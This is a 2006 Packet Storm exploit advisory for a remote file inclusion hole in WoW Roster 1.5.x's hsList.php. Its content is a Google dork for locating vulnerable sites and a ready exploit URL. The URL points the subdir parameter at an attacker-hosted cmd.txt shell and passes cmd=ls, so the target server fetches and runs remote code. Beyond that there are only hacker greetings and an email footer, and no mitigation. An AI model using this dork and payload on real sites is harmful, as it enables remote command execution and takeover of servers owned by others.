wowroster15x.txt

2006-08-17T00:00:00
ID PACKETSTORM:48987
Type packetstorm
Reporter AG-Spider
Modified 2006-08-17T00:00:00

Description

                                        
                                            `Title : WoW Roster <= 1.5.x Remote File Include (hsList.php)  
  
###############################################################################  
  
Discovered By :::: AG-Spider  
  
-----------------------------------------------------------------------------  
Class : Remote file include  
Rish : Danger  
-----------------------------------------------------------------------------  
  
dork : "wow roster version 1.5"  
  
Exploit :   
http://www.site.com/[wow_roster_path]/hsList.php?subdir=http://[Shellc0de]]/cmd.txt?&cmd=ls  
  
  
----------------------------------------------------------------------------  
  
greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy]  
  
c0natct us : AG-Spider [ at ] HoTMail.CoM  
thx 2 :::::: Lezr.com & 3asfh.net  
  
_________________________________________________________________  
The new MSN Search Toolbar now includes Desktop search!   
http://join.msn.com/toolbar/overview  
  
`